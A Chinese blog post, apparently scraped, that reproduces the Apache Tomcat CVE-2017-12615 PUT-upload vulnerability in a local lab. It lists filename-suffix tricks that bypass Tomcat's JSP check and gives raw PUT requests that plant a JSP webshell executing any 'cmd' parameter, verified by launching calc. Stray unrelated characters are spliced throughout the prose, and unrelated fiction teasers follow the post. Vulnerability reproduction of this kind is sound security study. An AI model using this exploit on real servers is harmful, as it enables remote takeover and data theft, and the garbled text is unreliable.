Tomcat漏洞CVE-2017-12615 上傳漏洞

1. 漏洞原理

當(dāng)存在漏洞的Tomcat運(yùn)行在Windows/Linux主機(jī)上笛辟, 且啟用了HTTP PUT請(qǐng)求方法( 例如诊笤, 將readonly初始化參數(shù)由默認(rèn)值設(shè)置為false) 沛贪, 攻擊者將有可能可通過精心構(gòu)造的攻擊請(qǐng)求數(shù)據(jù)包向服務(wù)器上傳包含任意代碼的JSP的webshell文件灯变,JSP文件中的惡意代碼將能被服務(wù)器執(zhí)行敬肚, 導(dǎo)致服務(wù)器上的數(shù)據(jù)泄露或獲取服務(wù)器權(quán)限。

影響版本:Apache Tomcat 7.0.0 - 7.0.79


2. 環(huán)境搭建

1. 下載apache-tomcat-7.0.79-windows-x64

2. 修改tomcat配置

3. 漏洞分析

可以看出即使設(shè)置readonly為false,默認(rèn)tomcat也不允許PUT上傳jsp和jspx文件倾贰, 因?yàn)楹蠖硕加胦rg.apache.catalina.servlets.JspServlet來處理jsp或是jspx后綴的請(qǐng)求冕碟, 而JspServlet負(fù)責(zé)處理所有JSP和JPSX類型的動(dòng)態(tài)請(qǐng)求, 從代碼沒有發(fā)現(xiàn)處理HTTP PUT類型的操作,所以可知PUT以

及DELTE等HTTP操作由DefautServelt實(shí)現(xiàn)躁染。 因此鸣哀, 就算我們構(gòu)造請(qǐng)求直接上傳JSP webshell顯然是不會(huì)成功的架忌。 該漏洞實(shí)際上是利用了windows下文件名解析的漏洞來觸發(fā)的吞彤。 根本是通過構(gòu)造特殊后綴名, 繞過Tomcat檢測(cè)叹放, 讓Tomcat用DefaultServlet的邏輯處理請(qǐng)求饰恕, 從而上傳jspwebshell文件。具體來說井仰, 主要有三種方法繞過這樣的檢測(cè):

shell.jsp%20

shell.jsp::$DATA

shell.jsp/

4. 運(yùn)行tomcat 雙擊startup.bat

5. 使用burpsuite抓包


3. 驗(yàn)證漏洞

1. 驗(yàn)證jsp文件埋嵌,無法寫入系統(tǒng)

PUT /test.jsp HTTP/1.1

Host: 172.16.22.76:8085

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 34

<%out.print("Hello World"); %>


2. txt文件可以寫入


3. 修改成shell.jsp/,成功寫入


4. 將jsp木馬寫入

PUT /shell1.jsp/ HTTP/1.1

Host: 172.16.22.76:8085

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 34

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

5. 測(cè)試上傳木馬

http://127.0.0.1:8085/shell1.jsp?cmd=calc

服務(wù)器彈出計(jì)算器

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末俱恶,一起剝皮案震驚了整個(gè)濱河市雹嗦,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌合是,老刑警劉巖了罪,帶你破解...
    沈念sama閱讀 217,734評(píng)論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異泊藕,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)难礼,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門娃圆,熙熙樓的掌柜王于貴愁眉苦臉地迎上來玫锋,“玉大人,你說我怎么就攤上這事讼呢×寐梗” “怎么了?”我有些...
    開封第一講書人閱讀 164,133評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵悦屏,是天一觀的道長三痰。 經(jīng)常有香客問我,道長窜管,這世上最難降的妖魔是什么散劫? 我笑而不...
    開封第一講書人閱讀 58,532評(píng)論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮幕帆,結(jié)果婚禮上获搏,老公的妹妹穿的比我還像新娘。我一直安慰自己失乾,他們只是感情好常熙,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,585評(píng)論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著碱茁,像睡著了一般裸卫。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上纽竣,一...
    開封第一講書人閱讀 51,462評(píng)論 1 302
  • 那天墓贿,我揣著相機(jī)與錄音,去河邊找鬼蜓氨。 笑死聋袋,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的穴吹。 我是一名探鬼主播幽勒,決...
    沈念sama閱讀 40,262評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢(mèng)啊……” “哼港令!你這毒婦竟也來了啥容?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,153評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤顷霹,失蹤者是張志新(化名)和其女友劉穎咪惠,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體泼返,經(jīng)...
    沈念sama閱讀 45,587評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡硝逢,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,792評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片渠鸽。...
    茶點(diǎn)故事閱讀 39,919評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡叫乌,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出徽缚,到底是詐尸還是另有隱情憨奸,我是刑警寧澤,帶...
    沈念sama閱讀 35,635評(píng)論 5 345
  • 正文 年R本政府宣布凿试,位于F島的核電站排宰,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏那婉。R本人自食惡果不足惜板甘,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,237評(píng)論 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望详炬。 院中可真熱鬧盐类,春花似錦、人聲如沸呛谜。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽隐岛。三九已至猫妙,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間聚凹,已是汗流浹背割坠。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評(píng)論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留元践,地道東北人韭脊。 一個(gè)月前我還...
    沈念sama閱讀 48,048評(píng)論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像单旁,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子饥伊,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,864評(píng)論 2 354